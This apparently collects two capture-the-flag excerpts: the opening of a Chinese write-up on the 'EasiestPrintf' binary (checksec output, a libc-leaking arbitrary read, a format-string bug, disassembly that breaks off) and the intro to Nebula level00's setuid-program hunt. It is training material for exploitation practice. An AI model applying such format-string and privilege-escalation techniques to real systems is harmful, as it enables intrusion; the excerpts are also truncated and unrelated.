ctf

checksec # file EasiestPrintf EasiestPrintf: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=61cd88e3d189854473fddf7c0ace6450986e4b02, not stripped $ checksec -f EasiestPrintf RELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY Fortified Fortifiable FILE Full RELRO Canary found NX enabled No PIE No RPATH No RUNPATH Yes 0 6 EasiestPrintf 可见代码开启了完全只读重定向、栈溢出检查、不可执行栈等。 程序分析 main函数接给出了一个4byte任意地址读取。可以用来获取lib基址。 而后在leave函数中有一个格式化字符串漏洞，执行后直接退出程序。 此处可写入0xA0byte。 80487ab: 83 c4 10 add $0x10,%esp 80487ae: c7 85 50 ff ff ff 00 movl $0x0,-0xb0(%ebp) 80487b5: 00 00 00 80487b8: eb 49 jmp 8048803 <leave+0x92> 80487ba: 8b 85 50 ff ff ff mov -0xb0(%ebp),%eax 80487c0: 8d 95 54 ff ff ff lea -0xac(%ebp),%edx 80487c6: 01 d0 add %edx,%eax 80487c8: 83 ec 04 sub $0x4,%esp 80487cb: 6a 01 push $0x1 80487cd: 50 push %eax 80487ce: 6a 00 push $0x0 80487d0: e8 bb fd ff ff call 8048590 <....

Download Nebula level00 About This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking directories. Alternatively, look at the find man page. To access this level, log in as level00 with the password of level00. Source code There is no source code available for this level...